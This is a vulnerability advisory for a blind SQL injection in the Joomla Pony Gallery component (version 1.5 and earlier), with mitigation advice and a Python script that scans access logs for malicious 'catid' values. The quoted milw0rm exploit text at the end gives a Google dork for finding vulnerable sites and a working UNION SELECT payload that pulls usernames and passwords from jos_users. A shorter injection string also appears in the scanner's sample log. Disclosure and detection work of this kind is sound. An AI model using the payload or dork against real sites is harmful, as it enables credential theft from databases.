Vendor: Pony Gallery
By: ajann
CVSS: 7.5 (HIGH)
Remote Blind SQL Injection
CWE: 89
Product Name: Pony Gallery
Affected Version From: <= 1.5
Affected Version To:
Patch Exists: NO
Platforms Tested:
2007

Joomla Component Pony Gallery <= 1.5 Remote Blind SQL Injection Vulnerability

This vulnerability allows an attacker to perform blind SQL injection in the Joomla Component Pony Gallery version 1.5 and below. By manipulating the 'catid' parameter in the 'viewcategory' function, an attacker can inject SQL code and potentially retrieve sensitive information from the database.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users are advised to restrict access to the affected component or apply a web application firewall to prevent exploitation.
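
Until a fix is available, access logs can be checked for the request shape described above. The following is an added example, not part of the original advisory or of the Pony Gallery code: it flags `func=viewcategory` requests to `com_ponygallery` whose URL-decoded `catid` is not a plain integer. It assumes combined-format access log lines; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d+")


def suspicious_catid(url):
    """Return the decoded catid if a Pony Gallery viewcategory request
    carries a non-integer value, else None."""
    # parse_qs URL-decodes values, so %20-encoded input is seen in clear text.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != "com_ponygallery":
        return None
    if query.get("func", [""])[0].lower() != "viewcategory":
        return None
    for value in query.get("catid", []):
        if not INTEGER_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_catid) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_catid(match.group(1))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2007:02:00:01 +0000] "GET /index.php?option=com_ponygallery&Itemid=5&func=viewcategory&catid=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Jul/2007:02:00:09 +0000] "GET //index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3%20from%20jos_users/* HTTP/1.1" 200 7311',
    '192.0.2.10 - - [19/Jul/2007:02:00:15 +0000] "GET /index.php?option=com_content&catid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer catid: {value!r}")
```

The same integer-only rule can be enforced in front of the application, for example as a web application firewall rule on `catid`.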

Exploit-DB raw data:

*******************************************************************************
# Title   :  Joomla Component Pony Gallery <= 1.5 Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://joomlander.net
# $$      :  Free
# Dork    :  inurl:"index.php?option=com_ponygallery"
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=inurl%3A%22index.php%3Foption%3Dcom_ponygallery%22&btnG=Ara&meta=lr%3D

# Info    :  *Enter any image category, and if it has a subcategory, enter that too;
               the vulnerability does not work on every site. Writing the exploit felt hard, to be honest,
               at 2 in the morning :)

# Msg     :  May your Kandil be blessed.....

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Inject]

Example: 

//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-07-19]